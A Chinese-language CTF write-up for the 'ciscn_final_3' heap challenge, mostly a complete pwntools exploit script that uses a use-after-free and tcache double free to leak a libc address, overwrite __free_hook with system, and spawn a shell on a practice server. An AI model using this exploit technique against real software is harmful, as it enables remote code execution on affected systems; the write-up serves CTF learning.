ciscn_final_3
程序給的glibc版本爲2.27,存在tcache機制
首先檢查一下程序的保護機制
然後,我們用IDA分析一下
Delete功能存在UAF漏洞
程序沒有show的功能,但是add時,會顯示堆的地址。
爲了能夠泄露出glibc地址,我們就要依靠這個add時打印的堆地址。我們只要讓tcache bin和unsorted bin重合,那麼就能通過申請,把堆申請到main_arena處,打印堆地址時,返回的就是main_arena的地址。由於glibc版本爲2.27,因此很容易利用,要得到unsorted bin範圍的chunk,我們只需要篡改chunk的頭部,然後多次free。
#coding:utf8
from pwn import *
#sh = process('./ciscn_final_3')
sh = remote('node3.buuoj.cn',29193)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
free_hook_s = libc.symbols['__free_hook']
malloc_hook_s = libc.symbols['__malloc_hook']
system_s = libc.sym['system']
def add(index,size,content):
sh.sendlineafter('choice >','1')
sh.sendlineafter('input the index',str(index))
sh.sendlineafter('input the size',str(size))
sh.sendafter('now you can write something',content)
sh.recvuntil('gift :')
heap_addr = int(sh.recvuntil('\n',drop = True),16)
return heap_addr
def delete(index):
sh.sendlineafter('choice >','2')
sh.sendlineafter('input the index',str(index))
#0
add(0,0x70,'a'*0x70) - 0x10
#1
heap_addr = add(1,0x70,'b'*0x70) - 0x10
for i in range(2,10):
add(i,0x70,'c'*0x70)
#10
add(10,0x10,'e'*0x10)
print 'heap_addr=',hex(heap_addr)
#double free
#多弄幾個,使得size最後不會變成負數
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)
#修改tcache的next指針,同時,設置chunk1的prev_size域爲chunk1本身的地址,這樣,我們申請到chunk1的頭部時,next指針就對應了prev_size域
#由此繼續形成了循環鏈表
add(11,0x78,p64(heap_addr) + 'a'*0x68 + p64(heap_addr + 0x10))
add(12,0x70,'a'*0x70)
#修改chunk1的頭信息,使得1~9的大小合併
add(13,0x70,p64(heap_addr) + p64(0x80*9 + 1))
#獲得unsorted bin
delete(1)
add(14,0x70,'d')
#申請到main_arena裏,從而獲得libc地址
main_arena_xx = add(15,0x70,'e')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#double free
delete(0)
delete(0)
add(16,0x70,p64(free_hook_addr))
add(17,0x70,'/bin/sh\x00')
#寫free_hook
add(18,0x70,p64(system_addr))
#getshell
delete(17)
sh.interactive()